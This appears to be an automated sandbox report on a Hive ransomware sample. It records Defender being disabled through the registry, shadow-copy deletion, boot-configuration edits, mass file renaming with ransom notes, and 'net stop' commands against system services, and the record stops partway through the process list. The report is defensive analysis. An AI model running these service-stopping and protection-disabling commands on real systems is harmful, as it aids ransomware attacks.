Malware Analysis Report

2024-10-16 03:13

Sample ID 220323-kf4q7aehgm
Target ransomware.exe
SHA256 1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498
Tags hive evasion ransomware spyware stealer trojan
Score 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score 10/10

SHA256 1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498

Threat Level: Known bad

The file ransomware.exe was found to be: Known bad.

Malicious Activity Summary

hive evasion ransomware spyware stealer trojan

Hive

Modifies security service

Deletes Windows Defender Definitions

Modifies Windows Defender Real-time Protection settings

Deletes shadow copies

Clears Windows event logs

Modifies boot configuration data using bcdedit

Modifies extensions of user files

Reads user/profile data of web browsers

Drops file in Program Files directory

Launches sc.exe

Opens file in notepad (likely ransom note)

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Interacts with shadow copies

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Runs ping.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-03-23 08:33

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-03-23 08:33

Reported

2022-03-23 08:40

Platform

win7-20220311-en

Max time kernel

4294202s

Max time network

130s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ransomware.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Hive

ransomware hive

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Modifies extensions of user files

ransomware
Description Indicator Process Target
File opened for modification C:\Users\Admin\Pictures\ProtectSelect.tiff.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File renamed C:\Users\Admin\Pictures\SkipDebug.png => C:\Users\Admin\Pictures\SkipDebug.png.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File renamed C:\Users\Admin\Pictures\GetApprove.tiff => C:\Users\Admin\Pictures\GetApprove.tiff.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Users\Admin\Pictures\OutSend.crw.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Users\Admin\Pictures\SendCheckpoint.raw.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Users\Admin\Pictures\DisableCompare.tif.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File renamed C:\Users\Admin\Pictures\PingImport.tif => C:\Users\Admin\Pictures\PingImport.tif.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File renamed C:\Users\Admin\Pictures\ProtectSelect.tiff => C:\Users\Admin\Pictures\ProtectSelect.tiff.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Users\Admin\Pictures\RevokeOut.tiff.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Users\Admin\Pictures\ShowOpen.raw.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File renamed C:\Users\Admin\Pictures\StopSync.crw => C:\Users\Admin\Pictures\StopSync.crw.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Users\Admin\Pictures\SkipDebug.png.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File renamed C:\Users\Admin\Pictures\DisableCompare.tif => C:\Users\Admin\Pictures\DisableCompare.tif.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Users\Admin\Pictures\PingImport.tif.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File renamed C:\Users\Admin\Pictures\RevokeOut.tiff => C:\Users\Admin\Pictures\RevokeOut.tiff.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File renamed C:\Users\Admin\Pictures\ShowOpen.raw => C:\Users\Admin\Pictures\ShowOpen.raw.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File renamed C:\Users\Admin\Pictures\SendCheckpoint.raw => C:\Users\Admin\Pictures\SendCheckpoint.raw.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Users\Admin\Pictures\StopSync.crw.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File renamed C:\Users\Admin\Pictures\SubmitReceive.raw => C:\Users\Admin\Pictures\SubmitReceive.raw.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Users\Admin\Pictures\SubmitReceive.raw.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Users\Admin\Pictures\GetApprove.tiff.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File renamed C:\Users\Admin\Pictures\OutSend.crw => C:\Users\Admin\Pictures\OutSend.crw.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0200467.WMF.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsViewAttachmentIcons.jpg.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\eclipse.inf.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\ink\fr-FR\mshwLatin.dll.mui C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00092_.GIF.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\PACBELL.NET.XML.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\PROGRAM.XML.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Manila.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tashkent.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\ARCTIC\PREVIEW.GIF.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SLATE\THMBNAIL.PNG.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TN00231_.WMF.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Civic.xml.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app_1.0.300.v20140228-1829.jar.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Shades of Blue.htm C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\BIZCARD.XML.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\ihr6_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File created C:\Program Files (x86)\Common Files\microsoft shared\TRANSLAT\ARFR\ihr6_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\TipBand.dll.mui C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cambridge_Bay.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Monrovia.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\it-IT\css\slideShow.css C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Peacock.htm C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sa_zh_CN.jar.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Panama.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\square.png C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\NavigationUp_ButtonGraphic.png C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Austin.eftx.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\MSTORE.HXS.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Swirl\background.gif.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\mn\LC_MESSAGES\ihr6_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105292.WMF.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382947.JPG.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\utilityfunctions.js.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\jawt_md.h.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Singapore.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-text.jar.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\.lastModified.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\GRPHFLT\PNG32.FLT.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BS00076_.WMF.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00542_.WMF.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\ACCWIZ\ACWZUSR12.ACCDU.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Detroit.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\license.html.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\EquityMergeFax.Dotx.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File created C:\Program Files\Microsoft Games\Mahjong\ja-JP\ihr6_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101861.BMP.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0151061.WMF.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\8.png C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\ihr6_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\ehshellLogo.png C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\fr-FR\gadget.xml C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-openide-util-enumerations.xml_hidden.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\it-IT\slideShow.html C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\RICEPAPR\RICEPAPR.INF.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR27F.GIF.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\RES98.POC.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Form.zip.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Ho_Chi_Minh.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\about.html.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Detroit.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A

Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\notepad.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1968 wrote to memory of 644 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\net.exe
PID 644 wrote to memory of 1624 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1968 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\net.exe
PID 1500 wrote to memory of 532 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1968 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\net.exe
PID 1976 wrote to memory of 1752 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1968 wrote to memory of 620 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\net.exe
PID 620 wrote to memory of 1984 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1968 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\net.exe
PID 2036 wrote to memory of 1056 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1968 wrote to memory of 1088 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\net.exe
PID 1088 wrote to memory of 852 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1968 wrote to memory of 820 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\net.exe
PID 820 wrote to memory of 1236 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1968 wrote to memory of 1464 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\net.exe
PID 1464 wrote to memory of 792 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1968 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\sc.exe
PID 1968 wrote to memory of 652 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\sc.exe
PID 1968 wrote to memory of 844 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\sc.exe
PID 1968 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\sc.exe
PID 1968 wrote to memory of 1204 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\sc.exe
PID 1968 wrote to memory of 684 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\sc.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ransomware.exe

"C:\Users\Admin\AppData\Local\Temp\ransomware.exe"

C:\Windows\system32\net.exe

net.exe stop "NetMsmqActivator" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "NetMsmqActivator" /y

C:\Windows\system32\net.exe

net.exe stop "SamSs" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\system32\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\system32\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\system32\net1.exe

